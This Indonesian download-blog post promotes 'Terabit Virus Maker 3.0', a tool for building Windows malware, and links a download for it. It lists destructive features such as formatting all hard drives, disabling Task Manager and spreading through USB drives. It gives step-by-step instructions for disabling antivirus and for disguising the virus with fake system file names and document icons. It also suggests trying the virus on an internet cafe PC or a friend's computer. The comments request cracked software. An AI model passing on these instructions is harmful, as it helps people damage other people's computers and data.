Download Full Version And Free Softwares

Jumat, 10 Juni 2011

Buat virus dengan Terabit Virus Maker 3.0

Atas request teman saya,malam ini saya akan share Terabit Virus Maker 3.0.Dengan Terabit Virus Maker,kamu bisa membuat virus dengan mudah.Mulai dari virus biasa sampai virus yang mematikan.Buat kamu yang pingin coba bikin virus dengan Terabit Virus Maker,saya sarankan jangan buat virusnya di PC/Laptop kamu.Coba saja di warnet atau di PC/Laptop temen kamu hehe.Mau tahu apa saja yang bisa dilakukan virus buatan Terabit Virus Maker 3.0 ini? Cekidot.


Fitur virus buatan Terabit Virus Maker :
  • Disable CMD
  • Disable Regedit
  • Disable Screen Saver
  • Disable Task Manager
  • Avoid Opening Media Player
  • Avoid Opening Mozilla Firefox
  • Avoid Opening Ms Config
  • Avoid Opening Notepad
  • Avoid Opening Yahoo Messenger
  • Hide Desktop Icons
  • Hide Folder Options Menu 
  • Hide Taskbar
  • Turn off Monitor
  • Turn off Computer after 5 min
  • Open/Close CD-Rom every 10 sec
  • Format All hard Drives
  • Spread with Removable Devices,Folders
  • and many more



Gimana tertarik untuk mencoba Terabit Virus Maker 3.0 ?
Silahkan Download Disini

Cara buat virus di Terabit Virus Maker : 

1.Matikan antivirus di PC kamu terlebih dahulu supaya virus bisa dibuat.
2.Jalankan aplikasi Terabit Virus Maker.
3.Tandai satu atau beberapa fitur virus yang ingin kamu buat.
4.Tandai "Fake Error Message" jika ingin virusnya menampilkan pesan error dan ketik kata-katanya di kotak "Message".
5.Tandai "Run Custom Command" jika ingin virusnya menjalankan aplikasi tertentu dan ketik aplikasinya di kotak "Command" misal Calc.exe.
6.Add Fake KB to virus,isi dengan angka yang kamu inginkan buat ukuran palsu virus yang kamu buat.
7.Pilih dari beberapa nama dari amoumain.exe sampai nvsvc.exe.
8.Pilih file icon mulai dari icon word sampai zip.
9.Pada kotak "File Name",namai virusnya misal virus.exe.
10.Dan klik Create Virus dan pilih di direktori mana kamu akan taruh virusnya.

Selamat Mencoba.

NB : Jangan lupa matikan antivirus di PC kamu terlebih dahulu sebelum mengekstrak Terabit Virus Maker,jangan khawatir karena memang bukan virus hanya program yang tidak diinginkan saja(Unwanted Program) Dan hati-hati nanti bisa jadi senjata makan tuan,jadi simpan dengan baik virus yang kamu buat.


INFO : Buat agan-agan yang mau mendukung ModernW4R3 agar tetap eksis dalam memposting artikel software,games,driver dan masih banyak lagi yang bermanfaat bagi kalian semua tentunya Full Version and Free.Silakan liat disini Donasi For ModernW4R3

9 komentar:

  1. th'x Sobat.. dah ngeshare Toolsnya..
    izin nyoba ahh pakai Trainer.. heheh
    biasanya pakai manual aja..hehehe
    kunjungan balik di tunggu yah sambil followan..

    BalasHapus
  2. Iya sama2 gan...
    oke ane follow jangan lupa folback ya :D ...

    BalasHapus
  3. salam sejahtera saudara , boleh dapatkan program 3d album terkini untuk membuat presentation gambar dan movie

    BalasHapus
  4. Tahniah saya sangat tertarik dengan blog ini .semoga sukses selamanya

    BalasHapus
  5. @Anonim : salam sejahtera,maksud'a aplikasi utk buat presentasi?

    Kalo suka dgn ModernW4R3,jgn lupa LIKE ModernW4R3 di Facebook oke :D ...

    BalasHapus
  6. saudara , ya maksudku nama aplikasi itu 3D ALBUM COMMERCIAL SUIT 3.20. Aku sudah cuba download yang crack tak berjaya . Jadi kalu dapat minta tolong kamu carikan . Lagipun setiap hari aku selalu lihat web ini sangat berguna sekali ilmunya syabas dan tahniah

    BalasHapus
  7. @Hjsalleh : Ane cari dulu ya gan 3D album commercial suit 3.20 nya...

    BalasHapus
  8. Muhammad Kahiruri ada koq di blog gw , kunjungi aj www.forumgenkster.blogspot.com

    BalasHapus

Cara Download Di ModernW4R3 :
Ketika link download di klik akan muncul iklan tunggu sekitar 5 detik lalu tombol kuning bertuliskan "SKIP AD" akan muncul lalu klik tombol itu dan anda akan dialihkan ke link download.

Silakan yang ingin bertanya maupun komplain seputar postingan diatas harap memberi komentar di kotak yang ada di bawah ini TERIMA KASIH...